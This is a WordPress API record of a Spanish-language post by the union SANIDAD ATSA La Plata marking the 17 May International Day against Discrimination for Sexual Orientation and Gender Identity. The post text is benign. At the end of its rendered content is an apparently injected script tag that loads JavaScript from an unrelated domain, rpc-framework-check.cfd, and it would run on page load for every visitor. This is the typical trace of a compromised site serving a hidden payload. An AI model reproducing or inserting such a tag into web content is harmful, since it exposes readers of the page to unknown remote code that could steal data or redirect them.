{"id":18474,"date":"2025-05-17T00:00:00","date_gmt":"2025-05-17T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18474"},"modified":"2026-02-02T17:07:34","modified_gmt":"2026-02-02T20:07:34","slug":"dia-internacional-contra-la-discriminacion-por-orientacion-sexual-e-identidad-de-genero-2","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/05\/dia-internacional-contra-la-discriminacion-por-orientacion-sexual-e-identidad-de-genero-2\/","title":{"rendered":"D\u00eda Internacional contra la Discriminaci\u00f3n por Orientaci\u00f3n Sexual e Identidad de G\u00e9nero"},"content":{"rendered":"\n<p>\ud83c\udf08 Un d\u00eda como hoy en 1990, la Organizaci\u00f3n Mundial de la Salud (OMS) elimin\u00f3 oficialmente la homosexualidad de su lista de enfermedades mentales.<\/p>\n\n\n\n<p>Desde entonces, esta fecha se transform\u00f3 en un s\u00edmbolo de lucha contra todas las formas de violencia, estigmatizaci\u00f3n y exclusi\u00f3n que todav\u00eda afectan a las personas lesbianas, gays, bisexuales, trans, no binaries e intersex en muchas partes del mundo.<\/p>\n\n\n\n<p>\ud83d\udce2 Desde SANIDAD ATSA La Plata, reivindicamos nuestro compromiso por una sociedad m\u00e1s justa, libre de prejuicios y con igualdad de derechos.<\/p>\n\n\n\n<p>#17DeMayo #Orgullo #NoALaDiscriminaci\u00f3n #Diversidad #DerechosHumanos #SAnidadATSALaPlata #SiempreJuntoAVos<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83c\udf08 Un d\u00eda como hoy en 1990, la Organizaci\u00f3n Mundial de la Salud (OMS) elimin\u00f3&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18475,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,97,119,85,148],"tags":[],"class_list":["post-18474","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-la-mujer","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18474","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18474"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18474\/revisions"}],"predecessor-version":[{"id":20811,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18474\/revisions\/20811"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18475"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18474"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18474"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18474"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}